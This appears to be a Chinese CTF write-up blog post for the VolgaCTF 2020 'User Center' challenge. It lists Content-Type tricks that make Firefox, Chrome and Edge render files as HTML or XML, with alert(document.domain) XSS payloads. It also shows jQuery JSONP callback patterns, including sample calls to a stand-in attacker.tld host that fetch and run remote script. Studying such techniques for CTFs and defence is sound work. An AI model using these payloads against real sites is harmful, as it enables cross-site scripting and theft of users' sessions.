VolgaCTF 2020 Qualifier User Center

mime绕过

题目过滤了html xml xsl,且Content-Type必须包含/

Firefox

  • 如果Content-Type标头不包含/字符,Firefox会尝试猜测文件类型。 此外,X-Content-Type-Options:nosniff在这种情况下无效,因为Firefox仅在尝试连接<script src =><link rel ="stylesheet" href =>中具有错误内容类型的文件时才使用它。

  • text/rdf被处理为xml

    Content-Type: text/rdf
    <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
    
  • multipart/x-mixed-replace支持HTML(示例)
    如果缺少nosniff,Edge会处理类似于常规HTML的类型。

    Content-Type: multipart/x-mixed-replace;boundary=xxx
    
    xxx
    Content-Type:text/html
    
    <script>alert(document.domain)</script>
    xxx--
    
  • */*
    此时Firefox会猜测文件类型,无视X-Content-Type-Options:nosniff

  • text/plain;,text/html支持多种逗号分隔类型

    Content-Type: text/plain;,text/html
    
    <script>alert(document.domain)</script>
    

Chrome

  • text/xsl被处理为xml

    Content-Type: text/xsl
    <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
    
  • text/plain;,text/html支持多种逗号分隔类型

    Content-Type: text/plain;,text/html
    
    <script>alert(document.domain)</script>
    

Edge

  • text/vtt被处理为html
    Content-Type: text/vtt
    <script>alert(document.domain)</script>
    

JSONP实现跨域

If the URL includes the string "callback=?" (or similar, as defined by the server-side API), the request is treated as JSONP instead. See the discussion of the jsonp data type in $.ajax() for more details.

因此,如果我们可以控制传递给$.getJSON的URL,就可以XSS

callback的正则表达式更改:

>  1.7.2 /(=)\?(?=&|$)|\?\?/
<= 1.7.2 /(\=)\?(&|$)|\?\?/i
<= 1.5.1 /(\=)\?(&|$)|()\?\?()/i
<= 1.4.4 /\=\?(&|$)/
<= 1.4.2 /=\?(&|$)/
<= 1.2.1 /=(\?|%3F)/g
<  1.2   not supported

代码示例

$.ajax({url:'https://attacker.tld/??', dataType:'json'});
$.ajax({url:'https://attacker.tld/=?&', dataType:'json'});
$.getJSON('https://attacker.tld??');
$.getJSON('https://??.attacker.tld');

$.getJSON('https://xxx.com?callback??');最后会被解析成https://xxx.com/?callbackjQueryxxx&_=[timestamp],然后将获取到的数据作为js执行

posted @ 2020-03-31 17:49  MustaphaMond  阅读(137)  评论(0编辑  收藏  举报